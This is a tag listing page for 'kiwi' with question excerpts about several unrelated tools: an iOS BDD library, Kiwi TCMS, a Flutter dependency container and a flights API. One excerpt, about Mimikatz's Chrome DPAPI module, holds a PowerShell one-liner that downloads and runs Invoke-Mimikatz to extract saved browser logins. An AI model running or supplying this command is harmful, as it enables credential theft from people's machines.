Questions tagged [kiwi]

Kiwi is a Behavior Driven Development library for iOS development. The goal is to provide a BDD library that is exquisitely simple to setup and use.

Kiwi is a Behavior Driven Development library for iOS development. The goal is to provide a BDD library that is exquisitely simple to setup and use.

It's syntax is inspired from Ruby's unit testing framework Rspec.

126 questions
0
votes
0 answers

Deprecated Chrome Flags

I want to know if there is any way to use deprecated chrome flags on Chromium-based mobile browsers? Eg. There was an amazing flag -> Overscroll history navigation in previous version chrome android. Enabling this flag helped in moving forward by…
0
votes
1 answer

can't fetch flight prices data

I have tried keeping yesterday's date, today's date but still showing same. my_code: requests.get(url="https://api.tequila.kiwi.com/v2/search?fly_from=LGA&fly_to=MIA&dateFrom=11/08/2022&dateTo=02/09/2022", headers=header) What is this error of 45…
0
votes
0 answers

how to move tomcat logs to syslog servers

I am trying to move my tomcat logs to syslog servers, this is because - if my environment goes down, I have live logs will be captured in syslog server to find the root cause. Please support! Thanks
fazil
  • 1
0
votes
1 answer

KIWI TCMS change time zone settings

How to change timezone settings on the kiwi tcms dashboard? Facing issue while executing the test run
0
votes
2 answers

Pushing Results to KiwiTCMS using RobotFramework Ride Issue

I am trying to get Robotframework(Ride) work with KiwiTCMS. I am making the connection to the KIWI server (local) but I am getting these errors that I am not sure where(In RIDE? or the .conf file?) to fix: [ ERROR ] Calling method 'start_suite' of…
Hendri
  • 3
  • 1
  • 4
0
votes
1 answer

Kiwi-TCMS manage.py migrate gets permission 13 error

Having trouble running the manage.py migrate command in our kubernetes cluster. It seems to have lost permission to run anything. None of the manage.py commands work, they all get the same issue. I have no ability to change the permissions or…
Jose
  • 11
  • 2
0
votes
0 answers

how to import the existing test cases from excel/csv file to kiwi test case Management Tool

I am new to Kiwi Tool. Can anyone help me in preparing API for Importing test cases, which are present in local excel sheet to the kiwi tool. Gone through the documentation. But not getting how to start with . Anyone explain me from scratch how to…
0
votes
1 answer

kiwi tcms is not able to search bugs from JIRA

I have integrated JIRA as third party bug tracker in locally deployed TCMS. as per steps mentioned in the doc Integration is successful. After this step, when i proceed to searching bug (Home > Search > Search bugs). TCMS does not list any…
sandy_1111
  • 233
  • 3
  • 13
0
votes
1 answer

Mimikatz - problem with handling spaces in the file path Dpapi::chrome

Why in mimikatz/kiwi cannot process first space when opening chrome database "Login Data" ? Example: IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1');…
user3391185
  • 33
  • 1
  • 1
  • 5
0
votes
1 answer

Choose dependency for injection using Kiwi in Flutter

I have the following code: KiwiContainer() ..registerFactory((c) => GetOrderListOfItemsUseCase( repository: c())) The problem here is that the GetOrderListOfItemsUseCase requires an instance of IProfileRepository…
Andrey Solera
  • 2,311
  • 2
  • 26
  • 51
0
votes
1 answer

How to run a PowerShell module using EasyKiwi

I have a PowerShell script. It contains one main functions and two auxiliary functions. I need this script to pass the EasyKiwi test (the module needs to be imported successfully). Does anyone know what are the conventions and what should I do in…
0
votes
0 answers

Kiwi framework equivalent in Quick Nimble framework

describe(@"URServiceDiscoveryWrapper", ^{ context(@"method getHomeCountryWithCompletion:", ^{ __block id mockedServiceDiscovery; beforeEach(^{ mockedServiceDiscovery = [KWMock…
0
votes
1 answer

xml syntax error in kiwi image

I am creating xml file and I am getting sysntax error. Below is error: unknown-4e99680:0: Relax-NG validity error : Element preferences has extra content: oemconfig Relax-NG validity error : Extra element preferences in…
abc
  • 165
  • 2
  • 10
0
votes
1 answer

How to stub readonly property with Kiwi 2, Objective-C

looking for little help on accessing readonly property with Kiwi. In short, I want to test if _myReadOnlyDict gets initialized or not. Problem is that myReadOnlyDict is still always empty(has no contents), despite that in beforeEach block it is…
eye bleed
  • 163
  • 2
  • 10
0
votes
1 answer

Travis CI, unable to run tests - Error: activesupport requires Ruby version >= 2.2.2

I have an open sourced Obj-C repository with Kiwi unit testing framework as CocoaPods dependency. To run tests I'm using Travis CI continious integration tool. Everything was fine previously, all unit tests were executed, but now I'm getting Travis…
Evgeny Karkan
  • 8,782
  • 2
  • 32
  • 38
1 2 3
8 9